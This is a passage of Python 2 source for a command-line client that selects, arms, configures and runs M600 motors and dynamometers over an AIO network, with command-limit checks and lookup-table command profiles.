  """Returns AIO node name for the specified motor."""
  # e.g. 'sbo' -> 'kAioNodeMotorSbo'.
  return 'kAioNodeMotor%s' % motor.capitalize()
def AioNodeNameFromDynoNickname(motor):
  """Returns AIO node name for the specified dyno motor."""
  # e.g. 'sbo' -> 'kAioNodeDynoMotorSbo'.
  return 'kAioNodeDynoMotor%s' % motor.capitalize()
def GetMotorErrorNames(error_bitmask):
  """Returns a list of error names corresponding to the specified bitmask."""
  # default_key=0 makes a clear bitmask decode to the name registered for
  # value 0 (presumably the 'no error' entry) rather than an empty list.
  return GetFlagNames(error_bitmask, MOTOR_ERROR_NAMES, 0)
def GetMotorWarningNames(warning_bitmask):
  """Returns a list of warning names corresponding to the specified bitmask."""
  # default_key=0 makes a clear bitmask decode to the name registered for
  # value 0 (presumably the 'no warning' entry) rather than an empty list.
  return GetFlagNames(warning_bitmask, MOTOR_WARNING_NAMES, 0)
def GetFlagNames(bitmask, bitmask_dict, default_key=None):
  """Returns a list based on bitmask_dict corresponding to set bits in bitmask.

  Args:
    bitmask: Integer containing a bitmask of desired fields.
    bitmask_dict: Dictionary with power-of-two integer keys and values
        containing names of the corresponding bits.
    default_key: Key to use if bitmask == 0. Set to None to return [].

  Returns:
    A list with the values of bitmask_dict specified by bitmask.
  """
  if bitmask:
    # items() instead of the Python-2-only iteritems(): identical behavior
    # here and keeps this helper portable to Python 3.
    return [name for bit, name in bitmask_dict.items() if bit & bitmask]
  if default_key is None:
    return []
  return [bitmask_dict[default_key]]
def GenerateCommandData(args):
  """Generates the data to use for a given speed or torque command.

  Args:
    args: List containing command input file & optional loop parameter.

  Returns:
    data: Numpy array of time, torque and speed limits.
    loop: Boolean of optional loop parameter.

  Raises:
    MotorClientError: An invalid filename or file format was specified.
  """
  cmd_file = args[0]
  if not os.path.isfile(cmd_file):
    raise MotorClientError('Invalid filename: %s' % cmd_file)

  # Handle 1st arg i.e. the command file.
  if cmd_file.endswith(('.py', '.pycmd')): # Treat as a Python file.
    # Run the lookup-table generator as a subprocess; it writes a binary
    # (.npy) table to stdout, which is captured in a temporary file.
    with tempfile.NamedTemporaryFile() as table_file:
      popen = subprocess.Popen([GEN_TABLE_PATH, '--input_file', cmd_file,
                                '--binary'],
                               stdout=table_file, stderr=subprocess.PIPE)
      _, stderr = popen.communicate()
      if popen.returncode != 0:
        raise MotorClientError('Generation of lookup table from %s failed. '
                               'stderr:\n%s' % (cmd_file, stderr))
      # Load the generated table back from the temp file before it vanishes.
      data = np.load(table_file.name)
      print 'Using %s to generate command profile.' % cmd_file
  else: # Treat as a text file for interpolation.
    try:
      data = np.loadtxt(cmd_file)
    except (IOError, ValueError):
      raise MotorClientError(
          'Invalid input text file: %s. Should contain a table of time, torques'
          'and speed limits with rows of the form:\n\n'
          'time torque1 torque2 ... torque8 omega_lower1 omega_lower2 ...'
          'omega_lower8 omega_upper1 omega_upper2 ... omega_upper8' % cmd_file)
    print 'Using interpolated values from %s for command profile.' % cmd_file

  # Every row must hold: 1 time + 8 torques + 8 lower limits + 8 upper limits.
  if data.shape[1] != 25:
    raise MotorClientError(
        'Invalid number of columns in command table. Expected 25, got %d. '
        'Revise input file to generate rows of the form:\n'
        'time torque1 torque2 ... torque8 omega_lower1 omega_lower2 ...'
        'omega_lower8 omega_upper1 omega_upper2 ... omega_upper8'
        % data.shape[1])

  # Handle 2nd arg i.e. the optional parameter to repeat.
  if len(args) == 1:
    loop = False
    print 'Defaulting to \"noloop\".'
  else:
    if args[1] == 'loop':
      loop = True
    elif args[1] == 'noloop':
      loop = False
    else:
      raise MotorClientError('Invalid option: %s. Expecting \"loop\" or '
                             '[default] \"noloop\".' % args[1])
  return data, loop
def CheckCommandLimits(
    cmd_min, cmd_max, cmd_min_limit, cmd_max_limit, cmd_type):
  """Validates a [cmd_min, cmd_max] command range against absolute limits.

  Raises MotorClientError if either extreme falls outside
  [cmd_min_limit, cmd_max_limit], or if the range itself is inverted.
  """
  below_floor = cmd_min < cmd_min_limit
  above_ceiling = cmd_max > cmd_max_limit
  if below_floor or above_ceiling:
    raise MotorClientError('Extreme %s outside of limits [%f, %f] '
                           'detected. Command not set.' %
                           (cmd_type, cmd_min_limit, cmd_max_limit))
  if cmd_min > cmd_max:
    raise MotorClientError('Invalid %s i.e. min value - %f, is greater '
                           'than max value - %f' % (cmd_type, cmd_min, cmd_max))
class CommandProfile(object):
  """Maintains a lookup table of motor commands while running motors."""

  def __init__(
      self, t, motor_cmd, cmd_min_limit, cmd_max_limit, cmd_type,
      loop_back=False):
    """Builds an interpolating command profile.

    Args:
      t: Sequence of sample times for the command table.
      motor_cmd: Command values at each sample time (one row per time).
      cmd_min_limit: Smallest allowed command value.
      cmd_max_limit: Largest allowed command value.
      cmd_type: Human-readable command name used in printed messages.
      loop_back: If True, the profile repeats by wrapping time modulo t[-1].
    """
    self._loop_back = loop_back
    self._t = t
    # Linear interpolation along time (axis 0) across all command columns.
    self._motor_cmd_func = interpolate.interp1d(self._t, motor_cmd, axis=0)

    cmd_max = np.max(motor_cmd)
    cmd_min = np.min(motor_cmd)
    print ('\nWith {t_start:.2f}s < t < {t_end:.2f}s:'
           '\n min({type}) = {min:f}\n max({type}) = {max:f}\n'.format(
               t_start=t[0], t_end=t[-1], type=cmd_type,
               min=cmd_min, max=cmd_max))
    # Reject the whole profile if any sample falls outside the limits.
    CheckCommandLimits(cmd_min, cmd_max, cmd_min_limit, cmd_max_limit, cmd_type)

  def __call__(self, t):
    """Returns the interpolated command row at time t, or None when done."""
    if self._loop_back:
      # Wrap time so the profile repeats indefinitely.
      t = np.mod(t, self._t[-1])
    elif t > self._t[-1]:
      # Profile exhausted; tell the caller there is nothing left to command.
      return None
    return list(self._motor_cmd_func(t))
class MotorCommandClient(cmd_client.WingCommandClient):
"""Command line client for running M600 motors."""
prompt = '(motor_client) '
_NUM_RETRIES = 10
_MOTORS = 'motors'
_DYNOS = 'dynos'
  def __init__(self, *args, **kwargs):
    """Initializes the client with empty target sets and AIO connections."""
    cmd_client.WingCommandClient.__init__(self, *args, **kwargs)

    # Target selections and per-motor nominal spin directions.
    self._motors_selected = set()
    self._dynos_selected = set()
    self._spin_dir = {}
    # Runners exist from the start (over empty target sets); listeners are
    # only created once targets are selected.
    self._motor_runner = Runner(self._motors_selected, self._spin_dir)
    self._dyno_runner = Runner(self._dynos_selected, self._spin_dir,
                               dyno_mode=True)
    self._motor_listener = None
    self._dyno_listener = None
    # Most recently commanded torque and speed-limit values.
    self._torque = 0.0
    self._omega_lower_limit = 0.0
    self._omega_upper_limit = 0.0
    # Dedicated AIO clients for arming, parameter set/get, and acks.
    self._arm_aio_client = aio.AioClient(
        ['kMessageTypeMotorSetState', 'kMessageTypeDynoMotorSetState'],
        timeout=0.1)
    self._set_param_aio_client = aio.AioClient(
        ['kMessageTypeMotorSetParam', 'kMessageTypeDynoMotorSetParam'],
        timeout=0.1)
    # The long range radio requires at least 2x160 ms for a complete command-
    # response cycle.
    self._ack_param_aio_client = aio.AioClient(
        ['kMessageTypeMotorAckParam'], timeout=0.35)
    self._get_param_aio_client = aio.AioClient(
        ['kMessageTypeMotorGetParam', 'kMessageTypeDynoMotorGetParam'],
        timeout=0.1)
    self._param_client = param_client.Client(timeout=0.1)
def TryStopThreads(self):
self._motor_runner.TryStop()
self._dyno_runner.TryStop()
if self._motor_listener:
self._motor_listener.TryStop()
if self._dyno_listener:
self._dyno_listener.TryStop()
def _GetListenerAndRunner(self, node_type):
if node_type == self._MOTORS:
return self._motor_listener, self._motor_runner
elif node_type == self._DYNOS:
return self._dyno_listener, self._dyno_runner
else:
raise MotorClientError('Unknown node type.')
def _CheckStatus(self, valid_statuses, node_type):
listener, _ = self._GetListenerAndRunner(node_type)
if not listener:
status = flags.kMotorStatusInit
else:
status = listener.GetMostRestrictiveMotorStatus()
if status not in valid_statuses:
raise MotorClientError(
'Invalid %s status. %s' % (
node_type.capitalize(), MOTOR_STATUS_NAMES[status]))
return True
  def _CheckMotorStatus(self, valid_statuses):
    # Convenience wrapper: validate the status of the selected motors.
    self._CheckStatus(valid_statuses, self._MOTORS)
  def _CheckDynoStatus(self, valid_statuses):
    # Convenience wrapper: validate the status of the selected dynos.
    self._CheckStatus(valid_statuses, self._DYNOS)
def _CheckTargetsSelected(self):
if self._motors_selected or self._dynos_selected:
return True
else:
raise MotorClientError('Invalid set of targets. Use either: '
'"set_targets" or "set_targets_dyno".')
  def _SetTargets(self, line, node_type):
    """Sets motor or dyno targets.

    Args:
      line: User supplied arguments specifying target motors.
      node_type: String specifying type of targets i.e. 'motors' or 'dynos'.

    Raises:
      MotorClientError: An invalid set of targets was specified.
    """
    targets_selected, _ = cmd_client.SelectArgs(
        line.split(), MOTORS, require_some=True, require_all=True,
        select_all=True, require_one=False)

    # Record the new selection and query each node's config; for motors the
    # config also determines the nominal spin direction per load type.
    if node_type == self._MOTORS:
      self._motors_selected = targets_selected
      motor_params = self._QueryConfig(self._motors_selected, self._MOTORS)
      self._spin_dir = self._GetSpinDir(motor_params)
    elif node_type == self._DYNOS:
      self._dynos_selected = targets_selected
      self._QueryConfig(self._dynos_selected, self._DYNOS)

    # Stop any threads tied to the previous selection before creating new
    # runners/listeners for the updated target sets.
    self.TryStopThreads()

    if self._motors_selected:
      print 'Motors selected: %s.' % ', '.join(self._motors_selected)
      self._motor_runner = Runner(self._motors_selected, self._spin_dir)
      self._motor_listener = Listener(self._motor_runner.StopRun,
                                      self._motors_selected)

    if self._dynos_selected:
      print 'Dynos selected: %s.' % ', '.join(self._dynos_selected)
      self._dyno_runner = Runner(self._dynos_selected, self._spin_dir,
                                 dyno_mode=True)
      self._dyno_listener = Listener(self._dyno_runner.StopRun,
                                     self._dynos_selected, dyno_mode=True)
  @cmd_client.Command()
  def do_set_targets(self, line): # pylint: disable=invalid-name
    """Sets motor targets e.g. "set_targets SBO SBI"."""
    # Re-targeting is only allowed while motors are idle or faulted.
    self._CheckMotorStatus([flags.kMotorStatusInit, flags.kMotorStatusError])
    self._SetTargets(line, self._MOTORS)
  @cmd_client.Command()
  def do_set_targets_dyno(self, line): # pylint: disable=invalid-name
    """Sets dyno targets e.g. "set_targets_dyno SBO SBI"."""
    # Re-targeting is only allowed while dynos are idle or faulted.
    self._CheckDynoStatus([flags.kMotorStatusInit, flags.kMotorStatusError])
    self._SetTargets(line, self._DYNOS)
  @cmd_client.Command()
  def do_get_targets(self, line): # pylint: disable=invalid-name
    """Displays selected motor & dyno targets."""
    # Read-only; `line` is unused but required by the cmd interface.
    print 'Current targets.\nMotors: %s.\nDynos: %s.' % (
        ', '.join(self._motors_selected), ', '.join(self._dynos_selected))
  @cmd_client.Command()
  def do_clear_targets(self, line): # pylint: disable=invalid-name
    """Clears selected motor & dyno targets."""
    # Remember the old selection only so it can be echoed back to the user.
    old_motors = self._motors_selected.copy()
    old_dynos = self._dynos_selected.copy()

    # Stop threads tied to the old selection, then reset all state to the
    # same empty-target configuration produced by __init__.
    self.TryStopThreads()
    self._motors_selected = set()
    self._dynos_selected = set()
    self._spin_dir = {}
    self._motor_runner = Runner(self._motors_selected, self._spin_dir)
    self._dyno_runner = Runner(self._dynos_selected, self._spin_dir,
                               dyno_mode=True)
    self._motor_listener = None
    self._dyno_listener = None

    print 'Cleared old targets.\nOld Motors: %s.\nOld Dynos: %s.' % (
        ', '.join(old_motors), ', '.join(old_dynos))
def complete_set_targets(self, text, *unused_args): # pylint: disable=invalid-name
return self._CompleteArg(text, sorted(MOTORS) + ['All'])
complete_set_targets_dyno = complete_set_targets
def _GetSpinDir(self, params):
"""Determine the nominal spin direction based off of the motor load type."""
# List of props that need to spin in the positive x direction / in the
# negative omega sense.
# Additional loads are to be added in future commits.
reversed_loads = [config_params.MotorLoadType.PROP_REV2_POSITIVE_X]
return {key: -1 if param and param.load_type in reversed_loads else 1
for key, param in params.iteritems()}
  def _QueryConfig(self, targets, target_type):
    """Test if targets are on the network and query their configurations.

    Args:
      targets: Iterable of motor/dyno nicknames to query.
      target_type: Either self._MOTORS or self._DYNOS.

    Returns:
      Dict mapping each target nickname to its config section, or None if
      the query timed out.
    """
    params = {}
    for target in targets:
      # NOTE(review): if target_type is neither _DYNOS nor _MOTORS, `node`
      # is left unbound and the GetSection call below raises NameError;
      # callers only pass the two known types.
      if target_type == self._DYNOS:
        node = aio_node_helper.Value(AioNodeNameFromDynoNickname(target))
      elif target_type == self._MOTORS:
        node = aio_node_helper.Value(AioNodeNameFromMotorNickname(target))
      section = param_client.SECTION_CONFIG
      try:
        params[target] = self._param_client.GetSection(node, section)
      except socket.timeout:
        # Target unreachable; recorded as None and reported as "unknown".
        params[target] = None
    self._PrintConfig(targets, params)
    return params
  def _PrintConfig(self, motors, params):
    """Print portions of the selected motor config params.

    Args:
      motors: Iterable of motor nicknames to print.
      params: Dict of nickname -> config section (or None on timeout).
    """
    # Strip the 'kMotorLoadType'/'kMotorType' prefixes from the enum C names
    # to produce human-readable labels.
    load_types = [load_type.CName()[len('kMotorLoadType'):]
                  for load_type in config_params.MotorLoadType.Names()]
    motor_types = [motor_type.CName()[len('kMotorType'):]
                   for motor_type in config_params.MotorType.Names()]
    # Pad labels so the printed columns line up across motors.
    load_type_max_str_len = max([len(name) for name in load_types])
    motor_type_max_str_len = max([len(name) for name in motor_types])
    for motor in sorted(motors):
      if params[motor] is None:
        # Query timed out for this motor (see _QueryConfig).
        print '%s: unknown' % motor
      else:
        print '{name}: motor_type: {motor_type} load_type: {load_type}'.format(
            name=motor,
            motor_type=(motor_types[params[motor].motor_type]
                        .ljust(motor_type_max_str_len)),
            load_type=(load_types[params[motor].load_type]
                       .ljust(load_type_max_str_len)))
    print ''
@cmd_client.Command()
def do_query_config(self, line): # pylint: disable=invalid-name
targets_selected, _ = cmd_client.SelectArgs(
line.split(), MOTORS, require_some=True, require_all=True,
select_all=True, require_one=False)
self._CheckMotorStatus([flags.kMotorStatusInit, flags.kMotorStatusError])
self._QueryConfig(targets_selected, self._MOTORS)
@cmd_client.Command()
def do_query_config_dyno(self, line): # pylint: disable=invalid-name
targets_selected, _ = cmd_client.SelectArgs(
line.split(), MOTORS, require_some=True, require_all=True,
select_all=True, require_one=False)
self._CheckDynoStatus([flags.kMotorStatusInit, flags.kMotorStatusError])
self._QueryConfig(targets_selected, self._DYNOS)
def _TryArm(self, arm_msg, arm_msg_type, node_type):
listener, _ = self._GetListenerAndRunner(node_type)
for _ in xrange(self._NUM_RETRIES):
self._arm_aio_client.Send(arm_msg, arm_msg_type, OPERATOR)
time.sleep(0.1)
if listener.AllMotorsArmed():
print 'Successfully armed %s.' % node_type
return
else:
raise MotorClientError('Failed to arm %s.' % node_type)
  @cmd_client.Command(num_args=0)
  def do_arm(self, unused_line):  # pylint: disable=invalid-name
    """Arms the selected motors and/or dynos."""
    # All selected nodes must be in the Init state before arming.
    if self._motors_selected:
      self._CheckMotorStatus([flags.kMotorStatusInit])
    if self._dynos_selected:
      self._CheckDynoStatus([flags.kMotorStatusInit])
    self._CheckTargetsSelected()
    if self._motors_selected:
      motor_arm_msg = pack_avionics_messages.MotorSetStateMessage()
      motor_arm_msg.command = actuator_types.kActuatorStateCommandArm
      # The arming signal is a safety code that must accompany the command.
      motor_arm_msg.command_data = safety_codes.MOTOR_ARMING_SIGNAL
      print 'Arming motors.'
      # Only address motors that are not already armed.
      motor_arm_msg.selected_motors = MotorsAsBits(
          self._motor_listener.GetUnarmedMotors())
      self._TryArm(
          motor_arm_msg, 'kMessageTypeMotorSetState', self._MOTORS)
    if self._dynos_selected:
      dyno_arm_msg = pack_avionics_messages.DynoMotorSetStateMessage()
      dyno_arm_msg.command = actuator_types.kActuatorStateCommandArm
      dyno_arm_msg.command_data = safety_codes.MOTOR_ARMING_SIGNAL
      print 'Arming dynos.'
      dyno_arm_msg.selected_motors = MotorsAsBits(
          self._dyno_listener.GetUnarmedMotors())
      self._TryArm(
          dyno_arm_msg, 'kMessageTypeDynoMotorSetState', self._DYNOS)
  def _SetParam(self, line, message, node_type):  # pylint: disable=invalid-name
    """Sets a param for a specified motor or dyno.

    Args:
      line: User-supplied string naming the targets, the param, and a value.
      message: A MotorSetParamMessage or DynoMotorSetParamMessage to fill in.
      node_type: Either self._MOTORS or self._DYNOS.

    Raises:
      MotorClientError: The value was not a number, or a target failed to
        acknowledge the new value.
    """
    targets, args = cmd_client.SelectArgs(
        line.split(), MOTORS, require_some=True, select_all=True)
    param, args = cmd_client.SelectArgs(
        args, MOTOR_PARAMS.keys(), require_one=True, select_all=False)
    # Dyno targets are distinguished from motors by a 'DYNO_' name prefix,
    # which is stripped again below when building the AIO address.
    if node_type == self._DYNOS:
      targets = ['DYNO_%s' % t.upper() for t in targets]
    try:
      value = float(args[0])
    except ValueError:
      raise MotorClientError('Invalid value: "%s".' % args[0])
    message.id = MOTOR_PARAMS[param]
    message.value = value
    failed_targets = []
    for target in targets:
      print 'Setting %s to %g on %s.' % (param, value, target)
      if target.startswith('DYNO_'):
        message.selected_motors = MotorsAsBits([target[len('DYNO_'):]])
        aio_target = AioNodeNameFromDynoNickname(target[len('DYNO_'):])
        success = self._TrySetParam(
            message, 'kMessageTypeDynoMotorSetParam', param, target, aio_target)
      else:
        message.selected_motors = MotorsAsBits([target])
        aio_target = AioNodeNameFromMotorNickname(target)
        success = self._TrySetParam(
            message, 'kMessageTypeMotorSetParam', param, target, aio_target)
      if not success:
        failed_targets.append(target)
    if failed_targets:
      raise MotorClientError('Failed to verify %s from %s.'
                             % (param, failed_targets))
  def _TrySetParam(self, message, msg_type, param, target, aio_target):
    """Sends a set-param message and waits for a matching ack.

    Returns:
      True if an ack from the expected node echoing both the param id and
      the value was received; False otherwise.
    """
    for _ in xrange(self._NUM_RETRIES):
      self._set_param_aio_client.Send(message, msg_type, OPERATOR)
      for _ in xrange(self._NUM_RETRIES):
        try:
          _, header, ack = self._ack_param_aio_client.Recv()
          # Only accept acks from the expected node that echo back the id
          # and value just set.
          if (header.source == aio_node_helper.Value(aio_target)
              and header.type == message_type.kMessageTypeMotorAckParam
              and ack.id == message.id and ack.value == message.value):
            print '%s %s: %g' % (target, param, ack.value)
            return True
        except socket.timeout:
          # A receive timeout aborts all remaining retries, including any
          # further re-sends of the set message.
          return False
    return False
@cmd_client.Command(num_args=3)
def do_set_param(self, line): # pylint: disable=invalid-name
"""Sets param for a specified motor, e.g. "set_motor_param SBO Ld 3.14"."""
self._CheckMotorStatus([flags.kMotorStatusInit, flags.kMotorStatusError])
message = pack_avionics_messages.MotorSetParamMessage()
self._SetParam(line, message, self._MOTORS)
@cmd_client.Command(num_args=3)
def do_set_param_dyno(self, line): # pylint: disable=invalid-name
"""Sets param for a specified dyno, e.g. "set_dyno_param SBO Ld 3.14"."""
self._CheckDynoStatus([flags.kMotorStatusInit, flags.kMotorStatusError])
message = pack_avionics_messages.DynoMotorSetParamMessage()
self._SetParam(line, message, self._DYNOS)
def complete_set_param(self, text, line, *unused_args): # pylint: disable=invalid-name
arg_number = len(line.split())
if not text:
arg_number += 1
if arg_number == 2:
return self._CompleteArg(text, sorted(MOTORS) + ['All'])
elif arg_number == 3:
return self._CompleteArg(text, sorted(MOTOR_PARAMS.keys()))
else:
return []
complete_set_param_dyno = complete_set_param
def _GetParam(self, line, message, node_type):
targets, args = cmd_client.SelectArgs(
line.split(), MOTORS, require_some=True, select_all=True)
param, _ = cmd_client.SelectArgs(
args, MOTOR_PARAMS.keys(), require_one=True, select_all=False)
if node_type == self._DYNOS:
targets = ['DYNO_%s' % t.upper() for t in targets]
message.id = MOTOR_PARAMS[param]
failed_targets = []
for target in targets:
print 'Getting %s from %s...' % (param, target)
success = True
if target.startswith('DYNO_'):
message.selected_motors = MotorsAsBits([target[len('DYNO_'):]])
aio_target = AioNodeNameFromDynoNickname(target[len('DYNO_'):])
success = self._TryGetParam(
message, 'kMessageTypeDynoMotorGetParam', param, target, aio_target)
else:
message.selected_motors = MotorsAsBits([target])
aio_target = AioNodeNameFromMotorNickname(target)
success = self._TryGetParam(
message, 'kMessageTypeMotorGetParam', param, target, aio_target)
if not success:
failed_targets.append(target)
if failed_targets:
raise MotorClientError('Failed to get %s from %s.'
% (param, failed_targets))
  def _TryGetParam(self, message, msg_type, param, target, aio_target):
    """Sends a get-param message and waits for a matching ack.

    Returns:
      True if an ack from the expected node echoing the param id was
      received (its value is printed); False otherwise.
    """
    for _ in xrange(self._NUM_RETRIES):
      self._get_param_aio_client.Send(message, msg_type, OPERATOR)
      for _ in xrange(self._NUM_RETRIES):
        try:
          _, header, ack = self._ack_param_aio_client.Recv()
          # Unlike _TrySetParam, only the param id is matched; the value is
          # whatever the target reports.
          if (header.source == aio_node_helper.Value(aio_target)
              and header.type == message_type.kMessageTypeMotorAckParam
              and ack.id == message.id):
            print '%s %s: %g' % (target, param, ack.value)
            return True
        except socket.timeout:
          # A receive timeout aborts all remaining retries.
          return False
    return False
@cmd_client.Command()
def do_get_param(self, line): # pylint: disable=invalid-name
self._CheckMotorStatus([flags.kMotorStatusInit, flags.kMotorStatusError])
message = pack_avionics_messages.MotorGetParamMessage()
self._GetParam(line, message, self._MOTORS)
@cmd_client.Command()
def do_get_param_dyno(self, line): # pylint: disable=invalid-name
self._CheckDynoStatus([flags.kMotorStatusInit, flags.kMotorStatusError])
message = pack_avionics_messages.DynoMotorGetParamMessage()
self._GetParam(line, message, self._DYNOS)
complete_get_param = complete_set_param
complete_get_param_dyno = complete_get_param
  @cmd_client.Command()
  def do_run(self, line):  # pylint: disable=invalid-name
    """Runs the selected motors and/or dynos.

    Specify a duration in "s" or "ms". E.g. "run 10s" or "run 300ms".

    Args:
      line: Command to this function.

    Raises:
      MotorClientError: An invalid duration was specified.
    """
    if self._motors_selected:
      self._CheckMotorStatus([flags.kMotorStatusArmed])
    if self._dynos_selected:
      self._CheckDynoStatus([flags.kMotorStatusArmed])
    self._CheckTargetsSelected()
    # Parse the duration suffix; 'ms' must be tested before 's' because any
    # 'ms' string also ends with 's'.
    if line.endswith('ms'):
      line = line[:-2]
      multiplier = 1e-3
    elif line.endswith('s'):
      line = line[:-1]
      multiplier = 1.0
    else:
      raise MotorClientError('Usage: run {$N {s|ms}}')
    try:
      duration = float(line) * multiplier
    except ValueError:
      raise MotorClientError('Invalid run time: \'%s\'' % line)
    if self._motor_runner.IsRunning() or self._dyno_runner.IsRunning():
      raise MotorClientError('Already running.')
    # Double-check arming via the listeners before starting each runner.
    if self._motors_selected:
      if not self._motor_listener.AllMotorsArmed():
        raise MotorClientError('Motors not armed.')
      self._motor_runner.StartRun(duration)
    if self._dynos_selected:
      if not self._dyno_listener.AllMotorsArmed():
        raise MotorClientError('Dynos not armed.')
      self._dyno_runner.StartRun(duration)
    print 'Running...'
@cmd_client.Command(num_args=0)
def do_stop(self, unused_line): # pylint: disable=invalid-name
"""Stops the motors and/or dynos."""
if self._motor_runner.IsRunning() or self._dyno_runner.IsRunning():
self._motor_runner.StopRun()
self._dyno_runner.StopRun()
else:
raise MotorClientError('Not running.')
print 'Run stopped.'
  def _GetCommandFunction(self, line):
    """Returns a complete command function for each selected motor and/or dyno.

    Args:
      line: Command to this function.

    Raises:
      MotorClientError: Motors and/or dynos are running.

    Returns:
      torque_func: A function that returns torque commands.
      omega_lower_func: A function that returns omega_lower commands.
      omega_upper_func: A function that returns omega_upper commands.
      freeze_command: Specifies if last command should persist on stop.
    """
    if self._motor_runner.IsRunning() or self._dyno_runner.IsRunning():
      raise MotorClientError('Motors and/or dynos are running.')
    args = line.split()
    data, loop = GenerateCommandData(args)
    # Lookup-table column layout: time, then 8 torque columns, 8 omega_lower
    # columns, and 8 omega_upper columns.
    t = data[:, 0]
    torque_cmd = data[:, 1:9]
    omega_lower_cmd = data[:, 9:17]
    omega_upper_cmd = data[:, 17:25]
    # Each profile interpolates its command table over time, clamped to the
    # corresponding command limits.
    torque_func = CommandProfile(t, torque_cmd, TORQUE_MIN_LIMIT,
                                 TORQUE_MAX_LIMIT, 'torque', loop)
    omega_lower_func = CommandProfile(t, omega_lower_cmd, OMEGA_MIN_LIMIT,
                                      OMEGA_MAX_LIMIT, 'omega', loop)
    omega_upper_func = CommandProfile(t, omega_upper_cmd, OMEGA_MIN_LIMIT,
                                      OMEGA_MAX_LIMIT, 'omega', loop)
    freeze_command = False
    return (torque_func, omega_lower_func, omega_upper_func, freeze_command)
  @cmd_client.Command(num_args=[1, 2])
  def do_set_command_function(self, line):  # pylint: disable=invalid-name, g-doc-args
    # pylint: disable=g-doc-args
    """Sets a command function for motor(s).

    Specify a filename which may be:
    - A Python file (must have .py suffix) corresponding to an input to
      gen_lookup_table.py
    - A text file whose output is a lookup table formatted per the output of
      gen_lookup_table.py.
    """
    # Permitted while Init, Armed, or Errored -- i.e. not while running.
    self._CheckMotorStatus(
        [flags.kMotorStatusInit, flags.kMotorStatusArmed,
         flags.kMotorStatusError])
    cmd_args = self._GetCommandFunction(line)
    self._motor_runner.SetCommandFunction(*cmd_args)
  @cmd_client.Command(num_args=[1, 2])
  def do_set_command_function_dyno(self, line):  # pylint: disable=invalid-name
    # pylint: disable=g-doc-args
    """Sets a command function for dyno(s).

    Specify a filename which may be:
    - A Python file (must have .py suffix) corresponding to an input to
      gen_lookup_table.py
    - A text file whose output is a lookup table formatted per the output of
      gen_lookup_table.py.
    """
    # Permitted while Init, Armed, or Errored -- i.e. not while running.
    self._CheckDynoStatus(
        [flags.kMotorStatusInit, flags.kMotorStatusArmed,
         flags.kMotorStatusError])
    cmd_args = self._GetCommandFunction(line)
    self._dyno_runner.SetCommandFunction(*cmd_args)
  def complete_set_motor_command_function(self, _, line, *unused_args):  # pylint: disable=invalid-name
    """Completes arguments for the "set_command_function" command."""
    args = line.split(None, 2)
    # The second argument is a filename; the optional third argument selects
    # 'loop' / 'noloop'.
    if len(args) > 2 or (len(args) == 2 and line.endswith(' ')):
      suggestions = ['noloop', 'loop']
      if len(args) == 3:
        if args[2] in suggestions:
          # Argument is already complete; nothing left to suggest.
          return []
        suggestions = [x for x in suggestions if x.startswith(args[2])]
    else:
      path = args[1] if len(args) == 2 else ''
      suggestions = cmd_client.CompleteFile(path)
      # Only offer directories, extensionless names, and supported
      # command-file extensions.
      suggestions = [x for x in suggestions
                     if (x.endswith(('/', '.py', '.pycmd', '.txt', '.dat'))
                         or x.find('.') < 0)]
    return suggestions
  complete_set_dyno_command_function = complete_set_motor_command_function
  @cmd_client.Command(num_args=2)
  def do_set_speed_limits(self, line):  # pylint: disable=invalid-name
    """Sets the speed limits for torque-mode e.g. set_speed_limits 100 200."""
    if not self._dynos_selected:
      raise MotorClientError('No dynos selected. Use "set_targets_dyno".')
    args = line.split()
    try:
      omega_lower = float(args[0])
      omega_upper = float(args[1])
    except ValueError:
      raise MotorClientError('Invalid argument(s): \'{:s}\''.format(line))
    CheckCommandLimits(
        omega_lower, omega_upper, OMEGA_MIN_LIMIT, OMEGA_MAX_LIMIT, 'omega')
    self._omega_lower_limit = omega_lower
    self._omega_upper_limit = omega_upper
    print 'Omega limits set to: %.2f rad/s, %.2f rad/s.' % (
        self._omega_lower_limit, self._omega_upper_limit)
    # Re-install the dyno command functions so the new limits take effect;
    # torque is held at self._torque, and freeze_command=True keeps the last
    # command in place when a run stops.
    torque_func = lambda _: self._torque
    omega_lower_func = lambda _: self._omega_lower_limit
    omega_upper_func = lambda _: self._omega_upper_limit
    freeze_command = True
    self._dyno_runner.SetCommandFunction(torque_func, omega_lower_func,
                                         omega_upper_func, freeze_command)
  @cmd_client.Command(num_args=1)
  def do_set_torque(self, line):  # pylint: disable=invalid-name
    """Sets motor torque."""
    if not self._dynos_selected:
      raise MotorClientError('No dynos selected. Use "set_targets_dyno".')
    try:
      torque = float(line)
    except ValueError:
      raise MotorClientError('Invalid argument(s): \'{:s}\''.format(line))
    # Torque mode requires speed limits to have been set first.
    if self._omega_lower_limit == 0 and self._omega_upper_limit == 0:
      raise MotorClientError('Omega limits not set. Use "set_speed_limits".')
    CheckCommandLimits(
        torque, torque, TORQUE_MIN_LIMIT, TORQUE_MAX_LIMIT, 'torque')
    self._torque = torque
    print 'Torque desired: %.2f Nm. Speed limits: %.2f rad/s, %.2f rad/s.' % (
        torque, self._omega_lower_limit, self._omega_upper_limit)
    # Hold the commanded torque constant; freeze_command=True keeps the last
    # command in place when a run stops.
    torque_func = lambda _: self._torque
    omega_lower_func = lambda _: self._omega_lower_limit
    omega_upper_func = lambda _: self._omega_upper_limit
    freeze_command = True
    self._dyno_runner.SetCommandFunction(torque_func, omega_lower_func,
                                         omega_upper_func, freeze_command)
@cmd_client.Command(num_args=1)
def do_set_omega(self, line): # pylint: disable=invalid-name
"""Sets motor speed."""
if not self._motors_selected:
raise MotorClientError('No motors selected. Use "set_targets".')
try:
omega = float(line)
except ValueError:
raise MotorClientError('Invalid omega: \'{:s}\''.format(line))
CheckCommandLimits(omega, omega, OMEGA_MIN_LIMIT, OMEGA_MAX_LIMIT, 'omega')
print 'Omega desired: %s rad/s' % omega
torque_func = lambda _: 0.0
omega_lower_func = lambda _: omega
omega_upper_func = lambda _: omega
freeze_command = True
self._motor_runner.SetCommandFunction(torque_func, omega_lower_func,
omega_upper_func, freeze_command)
  def _RampCommand(self, line, cmd_type, runner):
    """Sets a motor speed or torque ramp.

    Args:
      line: Command to this function.
      cmd_type: Torque or Omega command to ramp.
      runner: Runner instance to use for setting command.

    Raises:
      MotorClientError: An invalid parameter was specified.
    """
    args = line.split(None, 2)
    try:
      cmd = float(args[0])
    except ValueError:
      # NOTE(review): this mixes str.format and %-interpolation; it renders
      # as "Invalid <cmd_type>: '<arg>'".
      raise MotorClientError('Invalid %s: \'{:s}\''.format(args[0]) % cmd_type)
    if len(args) == 2:
      try:
